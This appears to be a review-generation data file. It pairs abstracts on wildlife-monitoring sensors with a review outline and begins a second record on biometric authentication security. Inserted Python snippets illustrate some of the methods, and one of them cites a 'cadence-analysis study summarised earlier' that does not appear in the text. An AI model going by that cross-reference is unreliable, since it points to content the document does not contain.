organizational levels by ecologists, behaviourists and conservation biologists. 3. Spatially dispersed groups of microphones (arrays) enable users to study signal directionality on a small scale or to locate animals and track their movements on a larger scale. 4. Advances in algorithm development can allow users to discriminate among species, sexes, age groups and individuals. 5. With such technology, users can remotely and non-invasively survey populations, describe the soundscape, quantify anthropogenic noise, study species interactions, gain new insights into the social dynamics of sound-producing animals and track the effects of factors such as climate change and habitat fragmentation on phenology and biodiversity. 6. There remain many challenges in the use of acoustic monitoring, including the difficulties in performing signal recognition across taxa. 
The bioacoustics community should focus on developing a --- paper_title: Recognition of moving ground targets by measuring and processing seismic signal paper_content: Abstract Because vehicles moving over ground generate a succession of impacts, the soil disturbances propagate away from the source as seismic waves. Thus, in the battlefield environment, we can detect moving ground vehicles by means of measuring seismic signals using a seismic velocity transducer, and automatically classify and recognize them by advance signal processing method. Because seismic sensor is easy to be developed by emerging micro-electro-mechanical system (MEMS) technology, seismic detection that will be low cost, low power, small volume and light weight is a promising method for moving ground targets. Such a detection method can be used in many different fields, such as battlefield surveillance, traffic monitoring, law enforcement and so on. The paper researches seismic signals of typical vehicle targets in order to extract features of seismic signal and to recognize targets. As a data fusion method, the technique of artificial neural networks (ANN) is applied to recognize seismic signals for vehicle targets. An improved BP algorithm and ANN data fusion architecture have been presented to improve learning speed and avoid local minimum points in error curve. The algorithm had been used for classification and recognition of seismic signals of vehicle targets in the outdoor environment. It can be proven that moving ground vehicles can be detected by measuring seismic signal, feature extraction of target seismic signal is correct and ANN data fusion is effective to solve the recognition and classification problem for moving ground targets. --- paper_title: Acoustic and seismic modalities for unattended ground sensors paper_content: In this paper, we have presented the relative advantages and complementary aspects of acoustic and seismic ground sensors. A detailed description of both acoustic and seismic ground sensing methods has been provided. Acoustic and seismic phenomenology including source mechanisms, propagation paths, attenuation, and sensing have been discussed in detail. The effects of seismo-acoustic and acousto-seismic interactions as well as recommendations for minimizing seismic/acoustic cross talk have been highlighted. We have shown representative acoustic and seismic ground sensor data to illustrate the advantages and complementary aspects of the two modalities. The data illustrate that seismic transducers often respond to acoustic excitation through acousto-seismic coupling. Based on these results, we discussed the implications of this phenomenology on the detection, identification, and localization objectives of unattended ground sensors. We have concluded with a methodology for selecting the preferred modality (acoustic and/or seismic) for a particular application. --- paper_title: Do ants make direct comparisons? paper_content: Many individual decisions are informed by direct comparison of the alternatives. In collective decisions, however, only certain group members may have the opportunity to compare options. Emigrating ant colonies (Temnothorax albipennis) show sophisticated nest-site choice, selecting superior sites even when they are nine times further away than the alternative. How do they do this? We used radio-frequency identification-tagged ants to monitor individual behaviour. Here we show for the first time that switching between nests during the decision process can influence nest choice without requiring direct comparison of nests. Ants finding the poor nest were likely to switch and find the good nest, whereas ants finding the good nest were more likely to stay committed to that nest. When ants switched quickly between the two nests, colonies chose the good nest. Switching by ants that had the opportunity to compare nests had little effect on nest choice. We suggest a new mechanism of collective nest choice: individuals respond to nest quality by the decision either to commit or to seek alternatives. Previously proposed mechanisms, recruitment latency and nest comparison, can be explained as side effects of this simple rule. Colony-level comparison and choice can emerge, without direct comparison by individuals.
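The cadence-analysis study summarised earlier in this list models temporal gait features with Gaussian Mixture Models and selects an "optimum" number of components per class. A minimal, hypothetical sketch of that idea (the two-dimensional features, the BIC-based model selection, and all numeric values are illustrative assumptions, not the paper's exact procedure):

import numpy as np
from sklearn.mixture import GaussianMixture

def fit_gait_gmm(features, max_components=5):
    # Fit GMMs with 1..max_components components to gait feature vectors and keep
    # the one with the lowest BIC, a stand-in for choosing an "optimum" model order.
    best_model, best_bic = None, np.inf
    for k in range(1, max_components + 1):
        gmm = GaussianMixture(n_components=k, covariance_type='diag', random_state=0)
        gmm.fit(features)
        bic = gmm.bic(features)
        if bic < best_bic:
            best_model, best_bic = gmm, bic
    return best_model

# Toy usage: classify a test pattern as 'human' or 'quadruped' by comparing class log-likelihoods.
rng = np.random.default_rng(0)
human = fit_gait_gmm(rng.normal([0.5, 0.25], 0.05, size=(200, 2)))  # e.g. [inter-step interval, spread]
quad = fit_gait_gmm(rng.normal([0.8, 0.40], 0.08, size=(200, 2)))
test = np.array([[0.52, 0.27]])
print('human' if human.score(test) > quad.score(test) else 'quadruped')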
--- paper_title: Evolution and sustainability of a wildlife monitoring sensor network paper_content: As sensor network technologies become more mature, they are increasingly being applied to a wide variety of applications, ranging from agricultural sensing to cattle, oceanic and volcanic monitoring. Significant efforts have been made in deploying and testing sensor networks resulting in unprecedented sensing capabilities. A key challenge has become how to make these emerging wireless sensor networks more sustainable and easier to maintain over increasingly prolonged deployments. In this paper, we report the findings from a one year deployment of an automated wildlife monitoring system for analyzing the social co-location patterns of European badgers (Meles meles) residing in a dense woodland environment. We describe the stages of its evolution cycle, from implementation, deployment and testing, to various iterations of software optimization, followed by hardware enhancements, which in turn triggered the need for further software optimization. We report preliminary descriptive analyses of a subset of the data collected, demonstrating the significant potential our system has to generate new insights into badger behavior. The main lessons learned were: the need to factor in the maintenance costs while designing the system; to look carefully at software and hardware interactions; the importance of a rapid initial prototype deployment (this was key to our success); and the need for continuous interaction with domain scientists which allows for unexpected optimizations. --- paper_title: CARNIVORE: a disruption-tolerant system for studying wildlife paper_content: We present CARNIVORE, a system for in situ, unobtrusive monitoring of cryptic, difficult-to-catch/observe wildlife in their natural habitat. CARNIVORE is a network of mobile and static nodes with sensing, processing, storage, and wireless communication capabilities. CARNIVORE's compact, low-power, mobile animal-borne nodes collect sensor data and transmit it to static nodes, which then relay it to the Internet. Depending on the wildlife being studied, the network can be quite sparse and therefore disconnected frequently for arbitrarily long periods of time. To support "disconnected operation", CARNIVORE uses an "opportunistic routing" approach taking advantage of every encounter between nodes (mobile-to-mobile and mobile-to-static) to propagate data. With a lifespan of 50-100 days, a CARNIVORE mobile node, outfitted on a collar, collects and transmits 1 GB of data compared to 450 kB of data from comparable commercially available wildlife collars. Each collar records 3-axis accelerometer and GPS data to infer animal behavior and energy consumption. Testing in both laboratory and free-range settings with domestic dogs shows that galloping and trotting behavior can be identified. Data collected from first deployments on mountain lions (Puma concolor) near Santa Cruz, CA, USA show that the system is a viable and useful tool for wildlife research. --- paper_title: Monitoring Animal Behaviour and Environmental Interactions Using Wireless Sensor Networks, GPS Collars and Satellite Remote Sensing paper_content: Remote monitoring of animal behaviour in the environment can assist in managing both the animal and its environmental impact. GPS collars which record animal locations with high temporal frequency allow researchers to monitor both animal behaviour and interactions with the environment.
These ground-based sensors can be combined with remotely-sensed satellite images to understand animal-landscape interactions. The key to combining these technologies is communication methods such as wireless sensor networks (WSNs). We explore this concept using a case-study from an extensive cattle enterprise in northern Australia and demonstrate the potential for combining GPS collars and satellite images in a WSN to monitor behavioural preferences and social behaviour of cattle. --- paper_title: Rapid Prototyping for Wildlife and Ecological Monitoring paper_content: Wildlife tracking and ecological monitoring are important for scientific monitoring, wildlife rehabilitation, disease control, and sustainable ecological development. Yet technologies for both of them are expensive and not scalable. Also it is important to tune the monitoring system parameters for different species to adapt their behavior and gain the best result of monitoring. In this paper, we propose using wireless sensor networks to build both short term and long term wildlife and ecological monitoring systems. For the short term system, everything used is off-the-shelf and can be easily purchased from the market. We suggest that before establishing a large scale wildlife/ecological monitoring network, it is worthwhile to first spend a short period of time constructing a rapid prototype of the targeted network. Through verifying the correctness of the prototype network, ecologists can find potential problems, avoid total system failure, and use the best-tuned parameters for the long-term monitoring network. --- paper_title: Energy-efficient computing for wildlife tracking: design tradeoffs and early experiences with ZebraNet paper_content: Over the past decade, mobile computing and wireless communication have become increasingly important drivers of many new computing applications. The field of wireless sensor networks particularly focuses on applications involving autonomous use of compute, sensing, and wireless communication devices for both scientific and commercial purposes. This paper examines the research decisions and design tradeoffs that arise when applying wireless peer-to-peer networking techniques in a mobile sensor network designed to support wildlife tracking for biology research.The ZebraNet system includes custom tracking collars (nodes) carried by animals under study across a large, wild area; the collars operate as a peer-to-peer network to deliver logged data back to researchers. The collars include global positioning system (GPS), Flash memory, wireless transceivers, and a small CPU; essentially each node is a small, wireless computing device. Since there is no cellular service or broadcast communication covering the region where animals are studied, ad hoc, peer-to-peer routing is needed. Although numerous ad hoc protocols exist, additional challenges arise because the researchers themselves are mobile and thus there is no fixed base station towards which to aim data. Overall, our goal is to use the least energy, storage, and other resources necessary to maintain a reliable system with a very high `data homing' success rate. We plan to deploy a 30-node ZebraNet system at the Mpala Research Centre in central Kenya. More broadly, we believe that the domain-centric protocols and energy tradeoffs presented here for ZebraNet will have general applicability in other wireless and sensor applications. 
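ZebraNet above (and CARNIVORE earlier) relies on delay-tolerant, opportunistic routing: collars store their logged data and swap it on every encounter until it eventually reaches the researchers. A deliberately simplified sketch of that store-and-forward idea (node and record names are hypothetical; real protocols add history-based peer selection, deletion policies, and energy budgeting):

# A toy store-and-forward exchange: whenever two collars (or a collar and a base
# station) meet, they merge their logged records, so data eventually "homes" to the
# researchers. Node and record names are made up for illustration.
def exchange(node_a, node_b):
    merged = node_a | node_b          # union of the records each node carries
    node_a.clear(); node_a.update(merged)
    node_b.clear(); node_b.update(merged)

zebra1 = {('zebra1', 'fix_0800')}
zebra2 = {('zebra2', 'fix_0800')}
base_station = set()

exchange(zebra1, zebra2)              # the two animals meet at a waterhole
exchange(zebra2, base_station)        # zebra2 later passes the researchers' vehicle
print(base_station)                   # both animals' fixes have been delivered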
--- paper_title: Animal Behaviour Understanding using Wireless Sensor Networks paper_content: This paper presents research that is being conducted by the Commonwealth Scientific and Industrial Research Organisation (CSIRO) with the aim of investigating the use of wireless sensor networks for automated livestock monitoring and control. It is difficult to achieve practical and reliable cattle monitoring with current conventional technologies due to challenges such as large grazing areas of cattle, long time periods of data sampling, and constantly varying physical environments. Wireless sensor networks bring a new level of possibilities into this area with the potential for greatly increased spatial and temporal resolution of measurement data. CSIRO has created a wireless sensor platform for animal behaviour monitoring where we are able to observe and collect information of animals without significantly interfering with them. Based on such monitoring information, we can identify each animal's behaviour and activities successfully. --- paper_title: Wireless indoor tracking network based on Kalman filters with an application to monitoring dairy cows paper_content: We propose an algorithm for estimating positions of devices in a sensor network using Kalman filtering techniques. The specific area of application is monitoring the movements of cows in a barn. The algorithm consists of two filters. The first filter enhances the signal-to-noise ratio of the observed signal strengths and gives interpolated values at specific timestamps. Information from the first filter is transferred to the second filter which estimates the positions. Methods for estimating the parameters of the filters are given and these provide a straightforward calibration of the system. --- paper_title: Identification of animal movement patterns using tri-axial accelerometry paper_content: An animal's behaviour is a response to its environment and physiological condition, and as such, gives vital clues as to its well-being, which is highly relevant in conservation issues. Behaviour can generally be typified by body motion and body posture, parameters that are both measurable using animal-attached accelerometers. Interpretation of acceleration data, however, can be complex, as the static (indicative of posture) and dynamic (motion) components are derived from the total acceleration values, which should ideally be recorded in all 3-dimensional axes. The principles of tri-axial accelerometry are summarised and discussed in terms of the commonalities that arise in patterns of acceleration across species that vary in body pattern, life-history strategy, and the medium they inhabit. Using tri-axial acceleration data from deployments on captive and free-living animals (n = 12 species), behaviours were identified that varied in complexity, from the rhythmic patterns of locomotion, to feeding, and more variable patterns including those relating to social interactions. These data can be combined with positional information to qualify patterns of area-use and map the distribution of target behaviours. The range and distribution of behaviour may also provide insight into the transmission of disease. In this way, the measurement of tri-axial acceleration can provide insight into individual and population level processes, which may ultimately influence the effectiveness of conservation practice.
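The tri-axial accelerometry abstract above distinguishes a static (posture/gravity) component from a dynamic (body-motion) component of the measured acceleration. One common way to approximate that split is a running-mean filter, sketched below purely for illustration (the window length and the ODBA-style summary are assumptions, not values taken from the paper):

import numpy as np

def split_static_dynamic(acc, window=25):
    # Split raw tri-axial acceleration (n_samples x 3) into a smoothed "static"
    # component (posture/gravity) and a "dynamic" component (body motion) using
    # a running mean; the window length is an illustrative choice.
    kernel = np.ones(window) / window
    static = np.column_stack([np.convolve(acc[:, i], kernel, mode='same') for i in range(3)])
    dynamic = acc - static
    odba = np.sum(np.abs(dynamic), axis=1)   # overall dynamic body acceleration per sample
    return static, dynamic, odba

# Toy usage with synthetic data: gravity on the z-axis plus small movement noise.
rng = np.random.default_rng(0)
acc = np.column_stack([rng.normal(0, 0.1, 200), rng.normal(0, 0.1, 200), rng.normal(1.0, 0.3, 200)])
static, dynamic, odba = split_static_dynamic(acc)
print(static[100].round(2), odba.mean().round(2))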
--- paper_title: Smart sensors for small rodent observation paper_content: Working towards the observation of rats (and other small rodents) in the wild we have developed tools that will enable us to study their behavior using a wireless network of wearable sensor nodes. The space and weight constraints resulting from the size of the animals have led to simple but functional approaches for vocalization classification and position estimation. For the resulting data we have developed novel, delay-tolerant routing and collection strategies. These are expected to be used in a sparse, dynamic network resulting from various rats being tagged with our nodes and running around freely - an area that will eventually be too big to be covered solely by stationary data sinks. Furthermore, the system is designed to extract information on the social interactions between animals from the routing data. It currently works in an indoor environment and we are preparing it for tests in a controlled outdoor setup. --- paper_title: ZigBee-based wireless sensor networks for classifying the behaviour of a herd of animals using classification trees paper_content: An in-depth study of wireless sensor networks applied to the monitoring of animal behaviour in the field is described. Herd motion data, such as the pitch angle of the neck and movement velocity, were monitored by an MTS310 sensor board equipped with a 2-axis accelerometer and received signal strength indicator functionality in a single-hop wireless sensor network. Pitch angle measurements and velocity estimates were transmitted through a wireless sensor network based on the ZigBee communication protocol. After data filtering, the pitch angle measurements together with velocity estimates were used to classify the animal behaviour into two classes: activity and inactivity. Considering all the advantages and drawbacks of classification trees compared to neural network and fuzzy logic classifiers, a general classification tree was preferred. The classification tree was constructed based on the measurements of the pitch angle of the neck and movement velocity of some animals in the herd and was used to predict the behaviour of other animals in the herd. The results showed that there was a large improvement in the classification accuracy if both the pitch angle of the neck and the velocity were employed as predictors when compared to just pitch angle or just velocity employed as a single predictor. The classification results showed the possibility of determining a general decision rule which can classify the behaviour of each individual in a herd of animals. The results were confirmed by manual registration and by GPS measurements. --- paper_title: Activity recognition from user-annotated acceleration data paper_content: In this work, algorithms are developed and evaluated to detect physical activities from data acquired using five small biaxial accelerometers worn simultaneously on different parts of the body. Acceleration data was collected from 20 subjects without researcher supervision or observation. Subjects were asked to perform a sequence of everyday tasks but not told specifically where or how to do them. Mean, energy, frequency-domain entropy, and correlation of acceleration data was calculated and several classifiers using these features were tested. Decision tree classifiers showed the best performance recognizing everyday activities with an overall accuracy rate of 84%.
The results show that although some activities are recognized well with subject-independent training data, others appear to require subject-specific training data. The results suggest that multiple accelerometers aid in recognition because conjunctions in acceleration feature values can effectively discriminate many activities. With just two biaxial accelerometers - thigh and wrist - the recognition performance dropped only slightly. This is the first work to investigate performance of recognition algorithms with multiple, wire-free accelerometers on 20 activities using datasets annotated by the subjects themselves. ---
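The activity-recognition study summarised at the end of this list computes mean, energy, frequency-domain entropy, and axis correlations over windows of acceleration data and classifies them with decision trees. A small sketch of that pipeline (synthetic data, window length, and normalisation choices are assumptions of this illustration, not the study's settings):

import numpy as np
from sklearn.tree import DecisionTreeClassifier

def window_features(window):
    # Per-axis mean, energy, frequency-domain entropy, and pairwise axis correlation
    # for one window of tri-axial acceleration (n_samples x 3).
    feats = [window.mean(axis=0), (window ** 2).mean(axis=0)]
    spectrum = np.abs(np.fft.rfft(window, axis=0)) ** 2
    p = spectrum / (spectrum.sum(axis=0) + 1e-12)
    feats.append(-(p * np.log2(p + 1e-12)).sum(axis=0))   # spectral entropy per axis
    corr = np.corrcoef(window, rowvar=False)
    feats.append(corr[np.triu_indices(3, k=1)])            # xy, xz, yz correlations
    return np.concatenate(feats)

# Toy usage: two synthetic "activities" with different dynamics, classified with a decision tree.
rng = np.random.default_rng(0)
X = [window_features(rng.normal(0, s, (128, 3))) for s in (0.2, 1.0) for _ in range(50)]
y = [0] * 50 + [1] * 50
clf = DecisionTreeClassifier(random_state=0).fit(X, y)
print(clf.score(X, y))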
Title: Sensing Solutions for Collecting Spatio-Temporal Data for Wildlife Monitoring Applications: A Review
Section 1: Introduction
Description 1: Write about the importance of animal movement in ecological processes and the challenges of traditional data collection methods.
Section 2: Classification of Technologies for Collecting Spatio-Temporal Data
Description 2: Explain the two main approaches (Lagrangian and Eulerian) for collecting spatio-temporal data, and the classification of technologies based on these approaches.
Section 3: Technologies for Eulerian Approach
Description 3: Discuss the technologies utilized for the Eulerian approach, including their modalities, sensors, and data analysis techniques.
Section 4: Echoes as a Modality
Description 4: Detail the use of radar, sonar, and lidar technologies inspired by animals like bats and dolphins that use echolocation.
Section 5: Visual Modality
Description 5: Describe how visual data from cameras can be used to identify and track animals, focusing on visual interpretation methods.
Section 6: Thermal Sensors (Thermal Receptors)
Description 6: Discuss the use of thermal sensors to detect animals based on their infrared radiation and thermal hotspots.
Section 7: Chemical Modality
Description 7: Explore the use of chemical sensors (electronic noses) for identifying animals based on volatile organic compounds they emit.
Section 8: Microphones (Acoustic Receptors)
Description 8: Explain the use of microphones to detect and identify animals through their vocal sounds and incidental noises.
Section 9: Seismic Modality
Description 9: Discuss the detection of animals through seismic waves produced by their movements, particularly footsteps.
Section 10: Technologies for the Lagrangian Approach
Description 10: Review the tagging technologies (like GPS, RFID) attached directly to animals for collecting spatio-temporal data, and the integration with wireless sensor networks.
Section 11: Integrating RFID Technology with Wireless Sensor Networks
Description 11: Explain how RFID technology is integrated with wireless sensor networks to enhance data collection and communication.
Section 12: Integrating GPS Technology and Wireless Sensor Networks
Description 12: Discuss the communication architectures for integrating GPS with wireless sensor networks, focusing on data transmission.
Section 13: Integration with Wireless Sensor Networks
Description 13: Describe the role of inertial sensors and radio communication in tracking and localizing animals using wireless sensor networks.
Section 14: Discussion
Description 14: Compare the technologies based on their data provision capabilities, performance metrics, and suitability for wildlife monitoring studies.
Section 15: Comparison of Technologies Based on Information They can Provide
Description 15: Provide a detailed comparison table of technologies regarding their ability to collect spatio-temporal features.
Section 16: Comparison of Technologies Based on Different Performance Metrics
Description 16: Compare the technologies in terms of disruptions, processing requirements, commercial availability, and invasiveness.
Section 17: Comparison of Technologies Based on the Subject of Study
Description 17: Compare the usage of different technologies across various wildlife species.
Section 18: Conclusions and Future Directions
Description 18: Summarize the current state of sensing technologies and propose future research directions in integrating wireless sensor networks for wildlife monitoring.
A Survey of Security and Privacy Issues for Biometrics Based Remote Authentication in Cloud
8
--- paper_title: Biometrics: a tool for information security paper_content: Establishing identity is becoming critical in our vastly interconnected society. Questions such as "Is she really who she claims to be?," "Is this person authorized to use this facility?," or "Is he in the watchlist posted by the government?" are routinely being posed in a variety of scenarios ranging from issuing a driver's license to gaining entry into a country. The need for reliable user authentication techniques has increased in the wake of heightened concerns about security and rapid advancements in networking, communication, and mobility. Biometrics, described as the science of recognizing an individual based on his or her physical or behavioral traits, is beginning to gain acceptance as a legitimate method for determining an individual's identity. Biometric systems have now been deployed in various commercial, civilian, and forensic applications as a means of establishing identity. In this paper, we provide an overview of biometrics and discuss some of the salient research issues that need to be addressed for making biometric technology an effective tool for providing information security. The primary contribution of this overview includes: 1) examining applications where biometrics can solve issues pertaining to information security; 2) enumerating the fundamental challenges encountered by biometric systems in real-world applications; and 3) discussing solutions to address the problems of scalability and security in large-scale authentication systems. --- paper_title: A Formal Study of the Privacy Concerns in Biometric-based Remote Authentication Schemes paper_content: With their increasing popularity in cryptosystems, biometrics have attracted more and more attention from the information security community. However, how to handle the relevant privacy concerns remains troublesome. In this paper, we propose a novel security model to formalize the privacy concerns in biometric-based remote authentication schemes. Our security model covers a number of practical privacy concerns such as identity privacy and transaction anonymity, which have not been formally considered in the literature. In addition, we propose a general biometric-based remote authentication scheme and prove its security in our security model. --- paper_title: Biometric Systems: Privacy and Secrecy Aspects paper_content: This paper addresses privacy leakage in biometric secrecy systems. Four settings are investigated. The first one is the standard Ahlswede-Csiszar secret-generation setting in which two terminals observe two correlated sequences. They form a common secret by interchanging a public message. This message should only contain a negligible amount of information about the secret, but here, in addition, we require it to leak as little information as possible about the biometric data. For this first case, the fundamental tradeoff between secret-key and privacy-leakage rates is determined. Also for the second setting, in which the secret is not generated but independently chosen, the fundamental secret-key versus privacy-leakage rate balance is found. Settings three and four focus on zero-leakage systems. Here the public message should only contain a negligible amount of information on both the secret and the biometric sequence. To achieve this, a private key is needed, which can only be observed by the terminals.
For both the generated-secret and the chosen-secret model, the regions of achievable secret-key versus private-key rate pairs are determined. For all four settings, the fundamental balance is determined for both unconditional and conditional privacy leakage. --- paper_title: A Quantitative Survey of various Fingerprint Enhancement techniques paper_content: Preprocessing is an important step in the area of image processing and pattern recognition. This paper aims to present a review of recent as well as classic fingerprint image enhancement techniques. The umbrella of techniques used for evaluation varies from histogram based enhancement, frequency transformation based, Gabor filter based enhancement and its variants to composite enhancement technique. The effectiveness of enhancement techniques proposed by various researchers is evaluated on the basis of peak signal to noise ratio and equal error rate which refers to robustness and stability of identification process. Experimental results shows that incorporating the enhancement technique based on Gabor filter in wavelet domain and composite method improves equal error rate .Improved error rate and peak signal noise ratio improves the identification/verification accuracy marginally. The major goal of the paper is to provide a comprehensive reference source for the researchers involved in enhancement of fingerprint images which is essential preprocessing step in automatic fingerprint identification and verification. --- paper_title: Check Your Biosignals Here: A new dataset for off-the-person ECG biometrics paper_content: The Check Your Biosignals Here initiative (CYBHi) was developed as a way of creating a dataset and consistently repeatable acquisition framework, to further extend research in electrocardiographic (ECG) biometrics. In particular, our work targets the novel trend towards off-the-person data acquisition, which opens a broad new set of challenges and opportunities both for research and industry. While datasets with ECG signals collected using medical grade equipment at the chest can be easily found, for off-the-person ECG data the solution is generally for each team to collect their own corpus at considerable expense of resources. In this paper we describe the context, experimental considerations, methods, and preliminary findings of two public datasets created by our team, one for short-term and another for long-term assessment, with ECG data collected at the hand palms and fingers. --- paper_title: Efficient fingerprint search based on database clustering paper_content: Fingerprint identification has been a great challenge due to its complex search of database. This paper proposes an efficient fingerprint search algorithm based on database clustering, which narrows down the search space of fine matching. Fingerprint is non-uniformly partitioned by a circular tessellation to compute a multi-scale orientation field as the main search feature. The average ridge distance is employed as an auxiliary feature. A modified K-means clustering technique is proposed to partition the orientation feature space into clusters. Based on the database clustering, a hierarchical query processing is proposed to facilitate an efficient fingerprint search, which not only greatly speeds up the search process but also improves the retrieval accuracy. The experimental results show the effectiveness and superiority of the proposed fingerprint search algorithm. 
--- paper_title: Fusion of electrocardiogram with unobtrusive biometrics: An efficient individual authentication system paper_content: This paper explores the effectiveness of a novel multibiometric system that is resulted from the fusion of the electrocardiogram (ECG) with an unobtrusive biometric face and another biometric fingerprint which is known to be a least obtrusive for efficient individual authentication. The unimodal systems of the face and the fingerprint biometrics are neither secure nor they can achieve the optimum performance. Using the ECG signal as one of the biometrics offer advantage to a multibiometric system that ECG is inherited to an individual which is confidential, secured and difficult to be forged. It has an inherent feature of vitality signs that ensures a strong protection against spoof attacks to the system. Transformation based score fusion technique is used to measure the performance of the fused system. In particular, the weighted sum of score rule is used where weights are computed using equal error rate (EER) and match score distributions of the unimodal systems. The performance of the proposed multibiometric system is measured using EER and receiver operating characteristic (ROC) curve. The results show the optimum performance of the multibiometric system fusing the ECG signal with the face and fingerprint biometrics which is achieved to an EER of 0.22%, as compared to the unimodal systems that have the EER of 10.80%, 4.52% and 2.12%, respectively for the ECG signal, face and fingerprint biometrics. --- paper_title: Improvisation of Biometrics Authentication and Identification through Keystrokes Pattern Analysis paper_content: In this paper we presented one fresh approach where the authentic user's typing credentials are combined with the password to make authentication convincingly more secure than the usual password used in both offline and online transactions. With the help of empirical data and prototype implementation of the approach, we justified that our approach is ease of use, improved in security and performance. In normal approach different keystroke event timing is used for user profile creation. Keystroke latency and duration is inadequate for user authentication, which motivates exploring other matrices. In this paper we proposed combination of different matrices and calculation of degree of disorder on keystroke latency as well as duration to generate user profile. Statistical analysis on these matrices evaluates enhanced authentication process. --- paper_title: Fingerprint Verification Using Spectral Minutiae Representations paper_content: Most fingerprint recognition systems are based on the use of a minutiae set, which is an unordered collection of minutiae locations and orientations suffering from various deformations such as translation, rotation, and scaling. The spectral minutiae representation introduced in this paper is a novel method to represent a minutiae set as a fixed-length feature vector, which is invariant to translation, and in which rotation and scaling become translations, so that they can be easily compensated for. These characteristics enable the combination of fingerprint recognition systems with template protection schemes that require a fixed-length feature vector. This paper introduces the concept of algorithms for two representation methods: the location-based spectral minutiae representation and the orientation-based spectral minutiae representation. 
Both algorithms are evaluated using two correlation-based spectral minutiae matching algorithms. We present the performance of our algorithms on three fingerprint databases. We also show how the performance can be improved by using a fusion scheme and singular points. --- paper_title: Robust Algorithm for Fingerprint Identification with a Simple Image Descriptor paper_content: The paper describes a fingerprint recognition system consisting of image preprocessing, filtration, feature extraction and matching for recognition. The image preprocessing includes normalization based on mean value and variation. The orientation field is extracted and Gabor filter is used to prepare the fingerprint image for further processing. For singular point detection the Poincare index with partitioning method is used. The ridgeline thinning is presented and so is the minutia extraction by CN algorithm. Different Toeplitz matrix descriptions are in the work. Their behavior against abstract set of points is tested. The presented algorithm has proved its successful use in identification of shifted, rotated and partial acquired fingerprints without additional scaling. --- paper_title: Human Authentication Based on ECG Waves Using Radon Transform paper_content: Automated security is one of the major concerns of modern times. Secure and reliable authentication systems are in great demand. A biometric trait like electrocardiogram (ECG) of a person is unique and secure. In this paper, we propose a human authentication system based on ECG waves considering a plotted ECG wave signal as an image. The Radon Transform is applied on the preprocessed ECG image to get a radon image consisting of projections for θ varying from 0 o to 180 o . The pairwise distance between the columns of Radon image is computed to get a feature vector. Correlation Coefficient between feature vector stored in the database and that of input image is computed to check the authenticity of a person. Then the confusion matrix is generated to find False Acceptance Ratio (FAR) and False Rejection Ratio (FRR). This methodology of authentication is tested on ECG wave data set of 105 individuals taken from Physionet QT Database. The proposed authentication system is found to have FAR of about 3.19% and FRR of about 0.128%. The overall accuracy of the system is found to be 99.85%. --- paper_title: Design and Analysis of a Highly User-Friendly, Secure, Privacy-Preserving, and Revocable Authentication Method paper_content: A large portion of system breaches are caused by authentication failure, either during the login process or in the post-authentication session; these failures are themselves related to the limitations associated with existing authentication methods. Current authentication methods, whether proxy based or biometrics based, are not user-centric and/or endanger users' (biometric) security and privacy. In this paper, we propose a biometrics based user-centric authentication approach. This method involves introducing a reference subject (RS), securely fusing the user's biometrics with the RS, generating a BioCapsule (BC) from the fused biometrics, and employing BCs for authentication. Such an approach is user friendly, identity bearing yet privacy-preserving, resilient, and revocable once a BC is compromised. It also supports “one-click sign-on” across systems by fusing the user's biometrics with a distinct RS on each system. Moreover, active and non-intrusive authentication can be automatically performed during post-authentication sessions. 
We formally prove that the secure fusion based approach is secure against various attacks. Extensive experiments and detailed comparison with existing approaches show that its performance (i.e., authentication accuracy) is comparable to existing typical biometric approaches and the new BC based approach also possesses many desirable features such as diversity and revocability. --- paper_title: Biohashing : two factor authentication featuring fingerprint data and tokenised random number paper_content: Abstract Human authentication is the security task whose job is to limit access to physical locations or computer network only to those with authorisation. This is done by equipped authorised users with passwords, tokens or using their biometrics. Unfortunately, the first two suffer a lack of security as they are easy being forgotten and stolen; even biometrics also suffers from some inherent limitation and specific security threats. A more practical approach is to combine two or more factor authenticator to reap benefits in security or convenient or both. This paper proposed a novel two factor authenticator based on iterated inner products between tokenised pseudo-random number and the user specific fingerprint feature, which generated from the integrated wavelet and Fourier–Mellin transform, and hence produce a set of user specific compact code that coined as BioHashing. BioHashing highly tolerant of data capture offsets, with same user fingerprint data resulting in highly correlated bitstrings. Moreover, there is no deterministic way to get the user specific code without having both token with random data and user fingerprint feature. This would protect us for instance against biometric fabrication by changing the user specific credential, is as simple as changing the token containing the random data. The BioHashing has significant functional advantages over solely biometrics i.e. zero equal error rate point and clean separation of the genuine and imposter populations, thereby allowing elimination of false accept rates without suffering from increased occurrence of false reject rates. --- paper_title: Fingerprint-Based Fuzzy Vault: Implementation and Performance paper_content: Reliable information security mechanisms are required to combat the rising magnitude of identity theft in our society. While cryptography is a powerful tool to achieve information security, one of the main challenges in cryptosystems is to maintain the secrecy of the cryptographic keys. Though biometric authentication can be used to ensure that only the legitimate user has access to the secret keys, a biometric system itself is vulnerable to a number of threats. A critical issue in biometric systems is to protect the template of a user which is typically stored in a database or a smart card. The fuzzy vault construct is a biometric cryptosystem that secures both the secret key and the biometric template by binding them within a cryptographic framework. We present a fully automatic implementation of the fuzzy vault scheme based on fingerprint minutiae. Since the fuzzy vault stores only a transformed version of the template, aligning the query fingerprint with the template is a challenging task. We extract high curvature points derived from the fingerprint orientation field and use them as helper data to align the template and query minutiae. The helper data itself do not leak any information about the minutiae template, yet contain sufficient information to align the template and query fingerprints accurately. 
Further, we apply a minutiae matcher during decoding to account for nonlinear distortion and this leads to significant improvement in the genuine accept rate. We demonstrate the performance of the vault implementation on two different fingerprint databases. We also show that performance improvement can be achieved by using multiple fingerprint impressions during enrollment and verification. --- paper_title: Provably Secure Remote Truly Three-Factor Authentication Scheme With Privacy Protection on Biometrics paper_content: A three-factor authentication scheme combines biometrics with passwords and smart cards to provide high-security remote authentication. Most existing schemes, however, rely on smart cards to verify biometric characteristics. The advantage of this approach is that the user's biometric data is not shared with remote server. But the disadvantage is that the remote server must trust the smart card to perform proper authentication which leads to various vulnerabilities. To achieve truly secure three-factor authentication, a method must keep the user's biometrics secret while still allowing the server to perform its own authentication. Our method achieves this. The proposed scheme fully preserves the privacy of the biometric data of every user, that is, the scheme does not reveal the biometric data to anyone else, including the remote servers. We demonstrate the completeness of the proposed scheme through the GNY (Gong, Needham, and Yahalom) logic. Furthermore, the security of our proposed scheme is proven through Bellare and Rogaway's model. As a further benefit, we point out that our method reduces the computation cost for the smart card. --- paper_title: An efficient biometrics-based remote user authentication scheme using smart cards paper_content: In this paper, we propose an efficient biometric-based remote user authentication scheme using smart cards, in which the computation cost is relatively low compared with other related schemes. The security of the proposed scheme is based on the one-way hash function, biometrics verification and smart card. Moreover, the proposed scheme enables the user to change their passwords freely and provides mutual authentication between the users and the remote server. In addition, many remote authentication schemes use timestamps to resist replay attacks. Therefore, 